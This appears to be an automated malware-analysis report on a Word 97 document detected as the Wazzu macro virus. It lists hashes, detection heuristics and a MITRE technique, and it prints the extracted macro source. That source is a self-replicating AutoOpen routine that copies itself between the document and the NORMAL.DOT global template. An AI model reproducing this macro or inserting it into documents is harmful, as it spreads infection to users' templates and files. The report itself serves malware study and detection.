Office (OLE) malware analysis — malicious · eeec86d9f46a40d8

MALICIOUS

Office (OLE)

30.5 KB Created: 1996-10-12 04:20:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: a221a7fd9ef50d606aedc5fd0af569ba SHA-1: 60d2616bf300e3f22f60d1aec923793637b81cf0 SHA-256: eeec86d9f46a40d83de4a425498ac42581951ea3ba28cd3cd04424f74f792e1e

220 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The file contains legacy WordBasic macro markers and a critical ClamAV detection for 'Doc.Trojan.Wazzu-47', indicating malicious intent. The AutoOpen macro attempts to copy itself to the global template 'NORMAL.DOT', suggesting a persistence mechanism. The macro's functionality is primarily focused on manipulating the document and its template, rather than directly downloading or executing external payloads.

Heuristics 4

ClamAV: Doc.Trojan.Wazzu-47 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Wazzu-47
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1576 bytes
SHA-256: `e41e429d36a191de2ca7bb97b7fb2cce181a625952a7f319d1e1aadc2babe070`
Detection ClamAV: Doc.Trojan.Wazzu-11 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "autoOpen" Public Sub MAIN() Attribute MAIN.VB_Description = "Runs AutoOpenScan" Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.autoOpen.MAIN" Dim fileMacro$ Dim globMacro$ Dim MacroFile$ On Error GoTo -1: On Error GoTo errCaught WordBasic.FileSummaryInfo Update:=1 Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSummaryInfo(False) WordBasic.CurValues.FileSummaryInfo dlg fileMacro$ = dlg.Directory + "\" + dlg.FileName + ":autoOpen" globMacro$ = "Global:autoOpen" MacroFile$ = UCase(WordBasic.[Right$](WordBasic.[MacroFileName$](WordBasic.[MacroName$](0)), 10)) If MacroFile$ = "NORMAL.DOT" Then WordBasic.MacroCopy globMacro$, fileMacro$ Else WordBasic.MacroCopy fileMacro$, globMacro$ End If WordBasic.FileSaveAs Format:=1 GoTo bye errCaught: bye: On Error GoTo -1: On Error GoTo 0 End Sub Private Sub RndWord() Dim wordNum WordBasic.FileSummaryInfo Update:=1 Dim dlg As Object: Set dlg = WordBasic.DialogRecord.DocumentStatistics(False) WordBasic.CurValues.DocumentStatistics dlg wordNum = WordBasic.Int(Rnd() * WordBasic.Val(dlg.Words)) WordBasic.StartOfDocument WordBasic.WordRight wordNum End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.